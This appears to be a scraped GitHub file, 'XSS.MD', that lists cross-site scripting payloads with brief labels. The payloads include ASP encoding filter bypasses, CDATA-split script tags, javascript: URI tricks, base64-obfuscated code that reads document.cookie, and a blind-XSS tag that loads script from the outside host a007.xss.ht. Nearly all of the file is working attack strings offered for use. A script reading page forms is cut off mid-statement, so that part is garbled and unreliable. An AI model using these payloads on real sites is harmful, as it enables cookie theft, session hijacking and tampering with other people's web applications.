Skip to content

Latest commit

 

History

History
26 lines (19 loc) · 1.26 KB

XSS.MD

File metadata and controls

26 lines (19 loc) · 1.26 KB

%u003Cscript%u003Eprompt%u0028303%u0029%u003C/script%u003E Older ASP encoding filter bypass

%253Cscript%253Ealert(1)%253C%252Fscript%253E Older ASP encoding filter bypass

<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]> XML Reflection XSS

javascript://%250aalert(1) Where :// is required after protocol

"\"><s>test"@gmail.com XSS in email addresses

javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='));

<script>eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='));</script>

<imG/sRc=l oNerrOr=(prompt)() x> "><script src=https://a007.xss.ht></script> Blind

<style onload=alert(1)> hack the planet z <script>confirm(1)</script> HTML Encoding “=””’><script></script> <script>var xss = '';f=document.forms;for(i=0;i GET Hidden Fields
XSS (((confirm)))``</scRipt x>